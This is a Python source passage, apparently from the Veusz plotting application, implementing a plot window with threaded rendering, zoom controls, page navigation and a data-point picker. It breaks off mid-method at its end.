from ..compat import crange
from .. import qtall as qt4
import numpy as N
from .. import setting
from ..dialogs import exceptiondialog
from .. import document
from .. import utils
from .. import widgets
def _(text, disambiguation=None, context='PlotWindow'):
"""Translate text."""
return qt4.QCoreApplication.translate(context, text, disambiguation)
class PickerCrosshairItem( qt4.QGraphicsPathItem ):
"""The picker cross widget: it moves from point to point and curve to curve
with the arrow keys, and hides itself when it looses focus"""
def __init__(self, parent=None):
path = qt4.QPainterPath()
path.addRect(-4, -4, 8, 8)
path.addRect(-5, -5, 10, 10)
path.moveTo(-8, 0)
path.lineTo(8, 0)
path.moveTo(0, -8)
path.lineTo(0, 8)
qt4.QGraphicsPathItem.__init__(self, path, parent)
self.setBrush(qt4.QBrush(qt4.Qt.black))
self.setFlags(self.flags() | qt4.QGraphicsItem.ItemIsFocusable)
def paint(self, painter, option, widget):
"""Override this to enforce the global antialiasing setting"""
aa = setting.settingdb['plot_antialias']
painter.save()
painter.setRenderHint(qt4.QPainter.Antialiasing, aa)
qt4.QGraphicsPathItem.paint(self, painter, option, widget)
painter.restore()
def focusOutEvent(self, event):
qt4.QGraphicsPathItem.focusOutEvent(self, event)
self.hide()
class RenderControl(qt4.QObject):
"""Object for rendering plots in a separate thread."""
signalRenderFinished = qt4.pyqtSignal(
int, qt4.QImage, document.PaintHelper)
def __init__(self, plotwindow):
"""Start up numthreads rendering threads."""
qt4.QObject.__init__(self)
self.sem = qt4.QSemaphore()
self.mutex = qt4.QMutex()
self.threads = []
self.exit = False
self.latestjobs = []
self.latestaddedjob = -1
self.latestdrawnjob = -1
self.plotwindow = plotwindow
self.updateNumberThreads()
def updateNumberThreads(self, num=None):
"""Changes the number of rendering threads."""
if num is None:
if qt4.QFontDatabase.supportsThreadedFontRendering():
# use number of threads in preference
num = setting.settingdb['plot_numthreads']
else:
# disable threads
num = 0
if self.threads:
# delete old ones
self.exit = True
self.sem.release(len(self.threads))
for t in self.threads:
t.wait()
del self.threads[:]
self.exit = False
# start new ones
for i in crange(num):
t = RenderThread(self)
t.start()
self.threads.append(t)
def exitThreads(self):
"""Exit threads started."""
self.updateNumberThreads(num=0)
def processNextJob(self):
"""Take a job from the queue and process it.
emits renderfinished(jobid, img, painthelper)
when done, if job has not been superseded
"""
self.mutex.lock()
jobid, helper = self.latestjobs[-1]
del self.latestjobs[-1]
lastadded = self.latestaddedjob
self.mutex.unlock()
# don't process jobs which have been superseded
if lastadded == jobid:
img = qt4.QImage(helper.pagesize[0], helper.pagesize[1],
qt4.QImage.Format_ARGB32_Premultiplied)
img.fill( setting.settingdb.color('page').rgb() )
painter = qt4.QPainter(img)
aa = self.plotwindow.antialias
painter.setRenderHint(qt4.QPainter.Antialiasing, aa)
painter.setRenderHint(qt4.QPainter.TextAntialiasing, aa)
helper.renderToPainter(painter)
painter.end()
self.mutex.lock()
# just throw away result if it older than the latest one
if jobid > self.latestdrawnjob:
self.signalRenderFinished.emit(jobid, img, helper)
self.latestdrawnjob = jobid
self.mutex.unlock()
# tell any listeners that a job has been processed
self.plotwindow.sigQueueChange.emit(-1)
def addJob(self, helper):
"""Process drawing job in PaintHelper given."""
# indicate that there is a new item to be processed to listeners
self.plotwindow.sigQueueChange.emit(1)
# add the job to the queue
self.mutex.lock()
self.latestaddedjob += 1
self.latestjobs.append( (self.latestaddedjob, helper) )
self.mutex.unlock()
if self.threads:
# tell a thread to process job
self.sem.release(1)
else:
# process job in current thread if multithreading disabled
self.processNextJob()
class RenderThread( qt4.QThread ):
"""A thread for processing rendering jobs.
This is controlled by a RenderControl object
"""
def __init__(self, rendercontrol):
qt4.QThread.__init__(self)
self.rc = rendercontrol
def run(self):
"""Repeat forever until told to exit.
If it aquires 1 resource from the semaphore it will process
the next job.
"""
while True:
# wait until we can aquire the resources
self.rc.sem.acquire(1)
if self.rc.exit:
break
try:
self.rc.processNextJob()
except Exception:
sys.stderr.write(_("Error in rendering thread\n"))
traceback.print_exc(file=sys.stderr)
class ControlGraphRoot(qt4.QGraphicsItem):
"""Control graph items are connected to this root item.
We don't use a group here as it would swallow parent events."""
def __init__(self):
qt4.QGraphicsItem.__init__(self)
def paint(self, painter, option, widget=None):
pass
def boundingRect(self):
return qt4.QRectF()
class PlotWindow( qt4.QGraphicsView ):
"""Class to show the plot(s) in a scrollable window."""
# emitted when new item on plot queue
sigQueueChange = qt4.pyqtSignal(int)
# on drawing a page
sigUpdatePage = qt4.pyqtSignal(int)
# point picked on plot
sigPointPicked = qt4.pyqtSignal(object)
# picker enabled
sigPickerEnabled = qt4.pyqtSignal(bool)
# axis values update from moving mouse
sigAxisValuesFromMouse = qt4.pyqtSignal(dict)
# gives widget clicked
sigWidgetClicked = qt4.pyqtSignal(object)
# how often the document can update
updateintervals = (
(0, _('Disable')),
(-1, _('On document change')),
(100, _('Every 0.1s')),
(250, _('Every 0.25s')),
(500, _('Every 0.5s')),
(1000, _('Every 1s')),
(2000, _('Every 2s')),
(5000, _('Every 5s')),
(10000, _('Every 10s')),
)
def __init__(self, document, parent, menu=None):
"""Initialise the window.
menu gives a menu to add any menu items to
"""
qt4.QGraphicsView.__init__(self, parent)
self.setBackgroundRole(qt4.QPalette.Dark)
self.scene = qt4.QGraphicsScene()
self.setScene(self.scene)
# this graphics scene item is the actual graph
pixmap = qt4.QPixmap(1, 1)
self.dpi = (pixmap.logicalDpiX(), pixmap.logicalDpiY())
self.pixmapitem = self.scene.addPixmap(pixmap)
# whether full screen mode
self.isfullscreen = False
# set to be parent's actions
self.vzactions = None
# for controlling plot elements
self.controlgraphroot = ControlGraphRoot()
self.scene.addItem(self.controlgraphroot)
# zoom rectangle for zooming into graph (not shown normally)
self.zoomrect = self.scene.addRect( 0, 0, 100, 100,
qt4.QPen(qt4.Qt.DotLine) )
self.zoomrect.setZValue(2.)
self.zoomrect.hide()
# picker graphicsitem for marking the picked point
self.pickeritem = PickerCrosshairItem()
self.scene.addItem(self.pickeritem)
self.pickeritem.setZValue(2.)
self.pickeritem.hide()
# all the widgets that picker key-navigation might cycle through
self.pickerwidgets = []
# the picker state
self.pickerinfo = widgets.PickInfo()
# set up so if document is modified we are notified
self.document = document
self.docchangeset = -100
self.oldpagenumber = -1
self.document.signalModified.connect(self.slotDocModified)
# state of last plot from painthelper
self.painthelper = None
self.lastwidgetsselected = []
self.oldzoom = -1.
self.zoomfactor = 1.
self.pagenumber = 0
self.ignoreclick = False
# for rendering plots in separate threads
self.rendercontrol = RenderControl(self)
self.rendercontrol.signalRenderFinished.connect(
self.slotRenderFinished)
# mode for clicking
self.clickmode = 'select'
self.currentclickmode = None
# wheel zooming/scrolling accumulator
self.sumwheeldelta = 0
# set up redrawing timer
self.timer = qt4.QTimer(self)
self.timer.timeout.connect(self.checkPlotUpdate)
# for drag scrolling
self.grabpos = None
self.scrolltimer = qt4.QTimer(self)
self.scrolltimer.setSingleShot(True)
# for turning clicking into scrolling after a period
self.scrolltimer.timeout.connect(self.slotBecomeScrollClick)
# get plot view updating policy
# -1: update on document changes
# 0: never update automatically
# >0: check for updates every x ms
self.interval = setting.settingdb['plot_updatepolicy']
# if using a time-based document update checking, start timer
if self.interval > 0:
self.timer.start(self.interval)
# load antialias settings
self.antialias = setting.settingdb['plot_antialias']
# allow window to get focus, to allow context menu
self.setFocusPolicy(qt4.Qt.StrongFocus)
# get mouse move events if mouse is not pressed
self.setMouseTracking(True)
# create toolbar in main window (urgh)
self.createToolbar(parent, menu)
def hideEvent(self, event):
"""Window closing, so exit rendering threads."""
self.rendercontrol.exitThreads()
qt4.QGraphicsView.hideEvent(self, event)
def sizeHint(self):
"""Return size hint for window."""
p = self.pixmapitem.pixmap()
if p.width() <= 1 and p.height() <= 1:
# if the document has been uninitialized, get the doc size
return qt4.QSize(*self.document.docSize())
return p.size()
def showToolbar(self, show=True):
"""Show or hide toolbar"""
self.viewtoolbar.setVisible(show)
def createToolbar(self, parent, menu=None):
"""Make a view toolbar, and optionally update menu."""
self.viewtoolbar = qt4.QToolBar(_("View toolbar - Veusz"), parent)
self.viewtoolbar.setObjectName('veuszviewtoolbar')
iconsize = setting.settingdb['toolbar_size']
self.viewtoolbar.setIconSize(qt4.QSize(iconsize, iconsize))
self.viewtoolbar.hide()
if parent:
parent.addToolBar(qt4.Qt.TopToolBarArea, self.viewtoolbar)
if parent and hasattr(parent, 'vzactions'):
# share actions with parent if possible
# as plot windows can be isolated from mainwindows, we need this
self.vzactions = actions = parent.vzactions
else:
self.vzactions = actions = {}
a = utils.makeAction
actions.update({
'view.zoomin':
a(self, _('Zoom into the plot'), _('Zoom &In'),
self.slotViewZoomIn,
icon='kde-zoom-in', key='Ctrl++'),
'view.zoomout':
a(self, _('Zoom out of the plot'), _('Zoom &Out'),
self.slotViewZoomOut,
icon='kde-zoom-out', key='Ctrl+-'),
'view.zoom11':
a(self, _('Restore plot to natural size'), _('Zoom 1:1'),
self.slotViewZoom11,
icon='kde-zoom-1-veuszedit', key='Ctrl+1'),
'view.zoomwidth':
a(self, _('Zoom plot to show whole width'), _('Zoom to width'),
self.slotViewZoomWidth,
icon='kde-zoom-width-veuszedit'),
'view.zoomheight':
a(self, _('Zoom plot to show whole height'), _('Zoom to height'),
self.slotViewZoomHeight,
icon='kde-zoom-height-veuszedit'),
'view.zoompage':
a(self, _('Zoom plot to show whole page'), _('Zoom to page'),
self.slotViewZoomPage,
icon='kde-zoom-page-veuszedit'),
'view.zoommenu':
a(self, _('Zoom functions menu'), _('Zoom'),
self.doZoomMenuButton,
icon='kde-zoom-veuszedit'),
'view.prevpage':
a(self, _('Move to the previous page'), _('&Previous page'),
self.slotViewPreviousPage,
icon='kde-go-previous', key='Ctrl+PgUp'),
'view.nextpage':
a(self, _('Move to the next page'), _('&Next page'),
self.slotViewNextPage,
icon='kde-go-next', key='Ctrl+PgDown'),
'view.select':
a(self, _('Select items from the graph or scroll'),
_('Select items or scroll'),
None,
icon='kde-mouse-pointer'),
'view.pick':
a(self, _('Read data points on the graph'),
_('Read data points'),
None,
icon='veusz-pick-data'),
'view.zoomgraph':
a(self, _('Zoom into graph'), _('Zoom graph'),
None,
icon='veusz-zoom-graph'),
'view.fullscreen':
a(self, _('View plot full screen'), _('Full screen'),
self.slotFullScreen,
icon='veusz-view-fullscreen', key='Ctrl+F11'),
})
if menu:
# only construct menu if required
menuitems = [
('view', '', [
'view.zoomin', 'view.zoomout',
'view.zoom11', 'view.zoomwidth',
'view.zoomheight', 'view.zoompage',
'',
'view.prevpage', 'view.nextpage',
'view.fullscreen',
'',
'view.select', 'view.pick', 'view.zoomgraph',
]),
]
utils.constructMenus(menu, {'view': menu}, menuitems,
actions)
# populate menu on zoom menu toolbar icon
zoommenu = qt4.QMenu(self)
zoomag = qt4.QActionGroup(self)
for act in ('view.zoomin', 'view.zoomout', 'view.zoom11',
'view.zoomwidth', 'view.zoomheight', 'view.zoompage'):
a = actions[act]
zoommenu.addAction(a)
zoomag.addAction(a)
a.vzname = act
actions['view.zoommenu'].setMenu(zoommenu)
zoomag.triggered.connect(self.zoomActionTriggered)
lastzoom = setting.settingdb.get('view_defaultzoom', 'view.zoompage')
self.updateZoomMenuButton(actions[lastzoom])
# add items to toolbar
utils.addToolbarActions(self.viewtoolbar, actions,
('view.prevpage', 'view.nextpage',
'view.fullscreen',
'view.select', 'view.pick',
'view.zoomgraph', 'view.zoommenu'))
# define action group for various different selection models
grp = self.selectactiongrp = qt4.QActionGroup(self)
grp.setExclusive(True)
for a in ('view.select', 'view.pick', 'view.zoomgraph'):
actions[a].setActionGroup(grp)
actions[a].setCheckable(True)
actions['view.select'].setChecked(True)
grp.triggered.connect(self.slotSelectMode)
return self.viewtoolbar
def zoomActionTriggered(self, action):
"""Keep track of the last zoom action selected."""
setting.settingdb['view_defaultzoom'] = action.vzname
self.updateZoomMenuButton(action)
def updateZoomMenuButton(self, action):
"""Make zoom button call default zoom action and change icon."""
menuact = self.vzactions['view.zoommenu']
setting.settingdb['view_defaultzoom'] = action.vzname
menuact.setIcon( action.icon() )
def doZoomMenuButton(self):
"""Select previous zoom option when clicking on zoom menu."""
act = self.vzactions[setting.settingdb['view_defaultzoom']]
act.trigger()
def doZoomRect(self, endpos):
"""Take the zoom rectangle drawn by the user and do the zooming.
endpos is a QPoint end point
This is pretty messy - first we have to work out the graph associated
to the first point
Then we have to iterate over each of the plotters, identify their
axes, and change the range of the axes to match the screen region
selected.
"""
# safety net
if self.grabpos is None or endpos is None:
return
# get points corresponding to corners of rectangle
pt1 = self.grabpos
pt2 = endpos
# work out whether it's worthwhile to zoom: only zoom if there
# are >=5 pixels movement
if abs((pt2-pt1).x()) < 10 or abs((pt2-pt1).y()) < 10:
return
# try to work out in which widget the first point is in
widget = self.painthelper.pointInWidgetBounds(
pt1.x(), pt1.y(), widgets.Graph)
if widget is None:
return
# convert points on plotter to points on axis for each axis
# we also add a neighbouring pixel for the rounding calculation
xpts = N.array( [pt1.x(), pt2.x(), pt1.x()+1, pt2.x()-1] )
ypts = N.array( [pt1.y(), pt2.y(), pt2.y()+1, pt2.y()-1] )
# build up operation list to do zoom
operations = []
axes = {}
# iterate over children, to look for plotters
for c in [i for i in widget.children if
isinstance(i, widgets.GenericPlotter)]:
# get axes associated with plotter
caxes = c.parent.getAxes( (c.settings.xAxis,
c.settings.yAxis) )
for a in caxes:
if a:
axes[a] = True
# iterate over each axis, and update the ranges
for axis in axes:
s = axis.settings
if s.direction == 'horizontal':
p = xpts
else:
p = ypts
# convert points on plotter to axis coordinates
# FIXME: Need To Trap Conversion Errors!
try:
r = axis.plotterToGraphCoords(
self.painthelper.widgetBounds(axis), p)
except KeyError:
continue
# invert if min and max are inverted
if r[1] < r[0]:
r[1], r[0] = r[0], r[1]
r[3], r[2] = r[2], r[3]
# build up operations to change axis
if s.min != r[0]:
operations.append( document.OperationSettingSet(
s.get('min'),
utils.round2delt(r[0], r[2])) )
if s.max != r[1]:
operations.append( document.OperationSettingSet(
s.get('max'),
utils.round2delt(r[1], r[3])) )
# finally change the axes
self.document.applyOperation(
document.OperationMultiple(operations,descr=_('zoom axes')) )
def axesForPoint(self, mousepos):
"""Find all the axes which contain the given mouse position"""
if self.painthelper is None:
return []
pos = self.mapToScene(mousepos)
px, py = pos.x(), pos.y()
axes = []
for widget, bounds in self.painthelper.widgetBoundsIterator(
widgettype=widgets.Axis):
# if widget is axis, and point lies within bounds
if ( px>=bounds[0] and px<=bounds[2] and
py>=bounds[1] and py<=bounds[3] ):
# convert correct pointer position
if widget.settings.direction == 'horizontal':
val = px
else:
val = py
coords=widget.plotterToGraphCoords(bounds, N.array([val]))
axes.append( (widget, coords[0]) )
return axes
def emitPicked(self, pickinfo):
"""Report that a new point has been picked"""
self.pickerinfo = pickinfo
self.pickeritem.setPos(pickinfo.screenpos[0], pickinfo.screenpos[1])
self.sigPointPicked.emit(pickinfo)
def doPick(self, mousepos):
"""Find the point on any plot-like widget closest to the cursor"""
self.pickerwidgets = []
pickinfo = widgets.PickInfo()
pos = self.mapToScene(mousepos)
for w, bounds in self.painthelper.widgetBoundsIterator():
try:
# ask the widget for its (visually) closest point to the cursor
info = w.pickPoint(pos.x(), pos.y(), bounds)
# this is a pickable widget, so remember it for future key navigation
self.pickerwidgets.append(w)
if info.distance < pickinfo.distance:
# and remember the overall closest
pickinfo = info
except AttributeError:
# ignore widgets that don't support axes or picking
continue
if not pickinfo:
self.pickeritem.hide()
return
self.emitPicked(pickinfo)
def slotBecomeScrollClick(self):
"""If the click is still down when this timer is reached then
we turn the click into a scrolling click."""
if self.currentclickmode == 'select':
qt4.QApplication.setOverrideCursor(qt4.QCursor(qt4.Qt.SizeAllCursor))
self.currentclickmode = 'scroll'
def mousePressEvent(self, event):
"""Allow user to drag window around."""
qt4.QGraphicsView.mousePressEvent(self, event)
# work out whether user is clicking on a control point
items = self.items(event.pos())
self.ignoreclick = ( len(items)==0 or
items[0] is not self.pixmapitem or
self.painthelper is None )
if event.button() == qt4.Qt.LeftButton and not self.ignoreclick:
# need to copy position, otherwise it gets reused!
self.winpos = qt4.QPoint(event.pos())
self.grabpos = self.mapToScene(self.winpos)
if self.clickmode == 'select':
# we set this to true unless the timer runs out (400ms),
# then it becomes a scroll click
# scroll clicks drag the window around, and selecting clicks
# select widgets!
self.scrolltimer.start(400)
elif self.clickmode == 'pick':
self.pickeritem.show()
self.pickeritem.setFocus(qt4.Qt.MouseFocusReason)
self.doPick(event.pos())
elif self.clickmode == 'scroll':
qt4.QApplication.setOverrideCursor(
qt4.QCursor(qt4.Qt.SizeAllCursor))
elif self.clickmode == 'graphzoom':
self.zoomrect.setRect(self.grabpos.x(), self.grabpos.y(),
0, 0)
self.zoomrect.show()
#self.label.drawRect(self.grabpos, self.grabpos)
# record what mode we were clicked in
self.currentclickmode = self.clickmode
def mouseMoveEvent(self, event):
"""Scroll window by how much the mouse has moved since last time."""
qt4.QGraphicsView.mouseMoveEvent(self, event)
if self.currentclickmode == 'scroll':
event.accept()
# move scroll bars by amount
pos = event.pos()
dx = self.winpos.x()-pos.x()
scrollx = self.horizontalScrollBar()
scrollx.setValue( scrollx.value() + dx )
dy = self.winpos.y()-pos.y()
scrolly = self.verticalScrollBar()
scrolly.setValue( scrolly.value() + dy )
# need to copy point
self.winpos = qt4.QPoint(event.pos())
elif self.currentclickmode == 'graphzoom' and self.grabpos is not None:
pos = self.mapToScene(event.pos())
r = self.zoomrect.rect()
self.zoomrect.setRect( r.x(), r.y(), pos.x()-r.x(),
pos.y()-r.y() )
elif self.clickmode == 'select' or self.clickmode == 'pick':
# find axes which map to this position
axes = self.axesForPoint(event.pos())
vals = dict([ (a[0].name, a[1]) for a in axes ])
self.sigAxisValuesFromMouse.emit(vals)
if self.currentclickmode == 'pick':
# drag the picker around
self.doPick(event.pos())
def mouseReleaseEvent(self, event):
"""If the mouse button is released, check whether the mouse
clicked on a widget, and emit a sigWidgetClicked(widget)."""
qt4.QGraphicsView.mouseReleaseEvent(self, event)
if event.button() == qt4.Qt.LeftButton and not self.ignoreclick:
event.accept()
self.scrolltimer.stop()
if self.currentclickmode == 'select':
# work out where the mouse clicked and choose widget
pos = self.mapToScene(event.pos())
self.locateClickWidget(pos.x(), pos.y())
elif self.currentclickmode == 'scroll':
# return the cursor to normal after scrolling
self.clickmode = 'select'
self.currentclickmode = None
qt4.QApplication.restoreOverrideCursor()
elif self.currentclickmode == 'graphzoom':
self.zoomrect.hide()
self.doZoomRect(self.mapToScene(event.pos()))
self.grabpos = None
elif self.currentclickmode == 'viewgetclick':
self.clickmode = 'select'
elif self.currentclickmode == 'pick':
self.currentclickmode = None
def keyPressEvent(self, event):
"""Keypad motion moves the picker if it has focus"""
if self.pickeritem.hasFocus():
k = event.key()
if k == qt4.Qt.Key_Left or k == qt4.Qt.Key_Right:
# navigate to the previous or next point on the curve
event.accept()
dir = 'right' if k == qt4.Qt.Key_Right else 'left'
ix = self.pickerinfo.index
pickinfo = self.pickerinfo.widget.pickIndex(
ix, dir, self.painthelper.widgetBounds(
self.pickerinfo.widget))
if pickinfo:
# more points visible in this direction
self.emitPicked(pickinfo)
return
elif k == qt4.Qt.Key_Up or k == qt4.Qt.Key_Down:
# navigate to the next plot up or down on the screen
event.accept()
p = self.pickeritem.pos()
oldw = self.pickerinfo.widget
pickinfo = widgets.PickInfo()
dist = float('inf')
for w in self.pickerwidgets:
if w == oldw:
continue
# ask the widgets to pick their point which is closest horizontally
# to the last (screen) x value picked
pi = w.pickPoint(self.pickerinfo.screenpos[0], p.y(),
self.painthelper.widgetBounds(w),
distance='horizontal')
if not pi:
continue
dy = p.y() - pi.screenpos[1]
# take the new point which is closest vertically to the current
# one and either above or below it as appropriate
if abs(dy) < dist and ( (k == qt4.Qt.Key_Up and dy > 0)
or (k == qt4.Qt.Key_Down and dy < 0) ):
pickinfo = pi
dist = abs(dy)
if pickinfo:
oldx = self.pickerinfo.screenpos[0]
self.emitPicked(pickinfo)
# restore the previous x-position, so that vertical navigation
# stays repeatable
pickinfo.screenpos = (oldx, pickinfo.screenpos[1])
return
# handle up-stream
qt4.QGraphicsView.keyPressEvent(self, event)
def wheelEvent(self, event):
"""For zooming in or moving."""
if event.modifiers() & qt4.Qt.ControlModifier:
self.sumwheeldelta += event.delta()
while self.sumwheeldelta <= -120:
self.slotViewZoomOut()
self.sumwheeldelta += 120
while self.sumwheeldelta >= 120:
self.slotViewZoomIn()
self.sumwheeldelta -= 120
elif event.modifiers() & qt4.Qt.ShiftModifier:
self.sumwheeldelta += event.delta()
while self.sumwheeldelta <= -120:
# scroll left
self.sumwheeldelta += 120
scrollx = self.horizontalScrollBar()
scrollx.setValue(scrollx.value() + 120)
while self.sumwheeldelta >= 120:
# scroll right
scrollx = self.horizontalScrollBar()
scrollx.setValue(scrollx.value() - 120)
self.sumwheeldelta -= 120
else:
qt4.QGraphicsView.wheelEvent(self, event)
def locateClickWidget(self, x, y):
"""Work out which widget was clicked, and if necessary send
a sigWidgetClicked(widget) signal."""
if self.document.getNumberPages() == 0:
return
widget = self.painthelper.identifyWidgetAtPoint(
x, y, antialias=self.antialias)
if widget is None:
# select page if nothing clicked
widget = self.document.basewidget.getPage(self.pagenumber)
# tell connected objects that widget was clicked
if widget is not None:
self.sigWidgetClicked.emit(widget)
def setPageNumber(self, pageno):
"""Move the the selected page."""
# we don't need to do anything
if (self.pagenumber == pageno and
self.document.changeset == self.docchangeset):
return
# keep within bounds
pageno = min(pageno, self.document.getNumberPages()-1)
pageno = max(0, pageno)
self.pagenumber = pageno
if self.pagenumber != self.oldpagenumber and self.interval != 0:
self.checkPlotUpdate()
def getPageNumber(self):
"""Get the the selected page."""
return self.pagenumber
@qt4.pyqtSlot(int)
def slotDocModified(self, ismodified):
"""Update plot on document being modified."""
# only update if doc is modified and the update policy is set
# to update on document updates
if ismodified and self.interval == -1:
self.checkPlotUpdate()
def checkPlotUpdate(self):
"""Check whether plot needs updating."""
# print >>sys.stderr, "checking update"
# no threads, so can't get interrupted here
# draw data into background pixmap if modified
if ( self.zoomfactor != self.oldzoom or
self.document.changeset != self.docchangeset or
self.pagenumber != self.oldpagenumber ):
# print >>sys.stderr, "updating"
self.pickeritem.hide()
self.pagenumber = min( self.document.getNumberPages() - 1,
self.pagenumber )
self.oldpagenumber = self.pagenumber
if self.pagenumber >= 0:
size = self.document.pageSize(
self.pagenumber, scaling=self.zoomfactor)
# draw the data into the buffer
# errors cause an exception window to pop up
try:
phelper = document.PaintHelper(
size, scaling=self.zoomfactor, dpi=self.dpi)
self.document.paintTo(phelper, self.pagenumber)
except Exception:
# stop updates this time round and show exception dialog
d = exceptiondialog.ExceptionDialog(sys.exc_info(), self)
self.oldzoom = self.zoomfactor
self.docchangeset = self.document.changeset
d.exec_()
self.painthelper = phelper
self.rendercontrol.addJob(phelper)
else:
self.painthelper = None
self.pagenumber = 0
size = self.document.docSize()
pixmap = qt4.QPixmap(*size)
pixmap.fill( setting.settingdb.color('page') )
self.setSceneRect(0, 0, *size)
self.pixmapitem.setPixmap(pixmap)
self.sigUpdatePage.emit(self.pagenumber)
self.updatePageToolbar()
self.updateControlGraphs(self.lastwidgetsselected)
self.oldzoom = self.zoomfactor
self.docchangeset = self.document.changeset
def slotRenderFinished(self, jobid, img, helper):
"""Update image on display if rendering (usually in other
thread) finished."""
bufferpixmap = qt4.QPixmap.fromImage(img)
self.setSceneRect(0, 0, bufferpixmap.width(), bufferpixmap.height())
self.pixmapitem.setPixmap(bufferpixmap)
def updatePlotSettings(self):
"""Update plot window settings from settings."""
self.setTimeout(setting.settingdb['plot_updatepolicy'])
self.antialias = setting.settingdb['plot_antialias']
self.rendercontrol.updateNumberThreads()
self.actionForceUpdate()
def contextMenuEvent(self, event):
"""Show context menu."""
menu = qt4.QMenu(self)
# add some useful entries
menu.addAction( self.vzactions['view.zoommenu'] )
menu.addSeparator()
menu.addAction( self.vzactions['view.prevpage'] )
menu.addAction( self.vzactions['view.nextpage'] )
menu.addSeparator()
# force an update now menu item
menu.addAction(_('Force update'), self.actionForceUpdate)
if self.isfullscreen:
menu.addAction(_('Close full screen'), self.slotFullScreen)
else:
menu.addAction( self.vzactions['view.fullscreen'] )
# Update policy submenu
submenu = menu.addMenu(_('Updates'))
intgrp = qt4.QActionGroup(self)
# bind interval options to actions
for intv, text in self.updateintervals:
act = intgrp.addAction(text)
act.setCheckable(True)
def setfn(interval):
return lambda checked: self.actionSetTimeout(interval, checked)
act.triggered.connect(setfn(intv))
if intv == self.interval:
act.setChecked(True)
submenu.addAction(act)
# antialias
menu.addSeparator()
act = menu.addAction(_('Antialias'), self.actionAntialias)
act.setCheckable(True)
act.setChecked(self.antialias)
menu.exec_(qt4.QCursor.pos())
def actionForceUpdate(self):
"""Force an update for the graph."""
self.docchangeset = -100
self.checkPlotUpdate()
def slotFullScreen(self):
"""Show window full screen or not."""
if not self.isfullscreen:
self._fullscreenwindow = FullScreenPlotWindow(
self.document, self.pagenumber)
else:
# cheesy way of closing full screen window
p = self
while p.parent() is not None:
p = p.parent()
p.close()
def setTimeout(self, interval):
"""Change timer setting without changing save value."""
self.interval = interval
if interval <= 0:
# stop updates
if self.timer.isActive():
self.timer.stop()
else:
# change interval to one selected
self.timer.setInterval(interval)
# start timer if it was stopped
if not self.timer.isActive():
self.timer.start()
def actionSetTimeout(self, interval, checked):
"""Called by setting the interval."""
self.setTimeout(interval)
# remember changes for next time
setting.settingdb['plot_updatepolicy'] = self.interval
def actionAntialias(self):
"""Toggle antialias."""
self.antialias = not self.antialias
setting.settingdb['plot_antialias'] = self.antialias
self.actionForceUpdate()
def setZoomFactor(self, zoomfactor):
"""Set the zoom factor of the window."""
zoomfactor = max(0.05, min(20, zoomfactor))
self.zoomfactor = float(zoomfactor)
self.checkPlotUpdate()
def slotViewZoomIn(self):
"""Zoom into the plot."""
self.setZoomFactor(self.zoomfactor * N.sqrt(2.))
def slotViewZoomOut(self):
"""Zoom out of the plot."""
self.setZoomFactor(self.zoomfactor / N.sqrt(2.))
def slotViewZoomWidth(self):
"""Make the zoom factor so that the plot fills the whole width."""
# need to take account of scroll bars when deciding size
viewportsize = self.maximumViewportSize()
aspectwin = viewportsize.width() / viewportsize.height()
r = self.pixmapitem.boundingRect()
aspectplot = r.width() / r.height()
width = viewportsize.width()
if aspectwin > aspectplot:
# take account of scroll bar
width -= self.verticalScrollBar().width()
mult = width / r.width()
self.setZoomFactor(self.zoomfactor * mult)
def slotViewZoomHeight(self):
"""Make the zoom factor so that the plot fills the whole width."""
# need to take account of scroll bars when deciding size
viewportsize = self.maximumViewportSize()
aspectwin = viewportsize.width() / viewportsize.height()
r = self.pixmapitem.boundingRect()
aspectplot = r.width() / r.height()
height = viewportsize.height()
if aspectwin < aspectplot:
# take account of scroll bar
height -= self.horizontalScrollBar().height()
mult = height / r.height()
self.setZoomFactor(self.zoomfactor * mult)
def slotViewZoomPage(self):
"""Make the zoom factor correct to show the whole page."""
viewportsize = self.maximumViewportSize()
r = self.pixmapitem.boundingRect()
if r.width() != 0 and r.height() != 0:
multw = viewportsize.width() / r.width()
multh = viewportsize.height() / r.height()
self.setZoomFactor(self.zoomfactor * min(multw, multh))
def slotViewZoom11(self):
"""Restore the zoom to 1:1"""
self.setZoomFactor(1.)
def slotViewPreviousPage(self):
"""View the previous page."""
self.setPageNumber( self.pagenumber - 1 )
def slotViewNextPage(self):
"""View the next page."""
self.setPageNumber( self.pagenumber + 1 )
def updatePageToolbar(self):
"""Update page number when the plot window says so."""
# disable previous and next page actions
if self.vzactions is not None:
np = self.document.getNumberPages()
self.vzactions['view.prevpage'].setEnabled(self.pagenumber != 0)
self.vzactions['view.nextpage'].setEnabled(self.pagenumber < np-1)
def slotSelectMode(self, action):
"""Called when the selection mode has changed."""
modecnvt = { self.vzactions['view.select'] : 'select',
self.vzactions['view.pick'] : 'pick',
self.vzactions['view.zoomgraph'] : 'graphzoom' }
# close the current picker
self.pickeritem.hide()
self.sigPickerEnabled.emit(False)
# convert action into clicking mode
self.clickmode = modecnvt[action]
if self.clickmode == 'select':
self.pixmapitem.unsetCursor()
#self.label.setCursor(qt4.Qt.ArrowCursor)
elif self.clickmode == 'graphzoom':
self.pixmapitem.unsetCursor()
#self.label.setCursor(qt4.Qt.CrossCursor)
elif self.clickmode == 'pick':
self.pixmapitem.setCursor(qt4.Qt.CrossCursor)
self.sigPickerEnabled.emit(True)
def getClick(self):
"""Return a click point from the graph."""
# wait for click from user
qt4.QApplication.setOverrideCursor(qt4.QCursor(qt4.Qt.CrossCursor))
oldmode = self.clickmode
self.clickmode = 'viewgetclick'
while self.clickmode == 'viewgetclick':
qt4.qApp.processEvents()
self.clickmode = oldmode
qt4.QApplication.restoreOverrideCursor()
# take clicked point and convert to coords of scrollview
pt = self.grabpos
# try to work out in which widget the first point is in
widget = self.painthelper.pointInWidgetBounds(
pt.x(), pt.y(), widgets.Graph)
if widget is None:
return []
# convert points on plotter to points on axis for each axis
xpts = N.array( [pt.x()] )
ypts = N.array( [pt.y()] )
axesretn = []
# iterate over children, to look for plotters
for c in [i for i in widget.children if
isinstance(i, widgets.GenericPlotter)]:
# get axes associated with plotter
axes = c.parent.getAxes( (c.settings.xAxis,
c.settings.yAxis) )
# iterate over each, and update the ranges
for axis in [a for a in axes if a is not None]:
s = axis.settings
if s.direction == 'horizontal':
p = xpts
else:
p = ypts
# convert point on plotter to axis coordinate
# FIXME: Need To Trap Conversion Errors!
r = axis.plotterToGraphCoords(
self.painthelper.widgetBounds(axis), p)
axesretn.append( (axis.path, r[0]) )
return axesretn
def selectedWidgets(self, widgets):
"""Update control items on screen associated with widget.
Called when widgets have been selected in the tree edit window
"""
self.updateControlGraphs(widgets)
self.lastwidgetsselected = widgets
def updateControlGraphs(self, widgets):
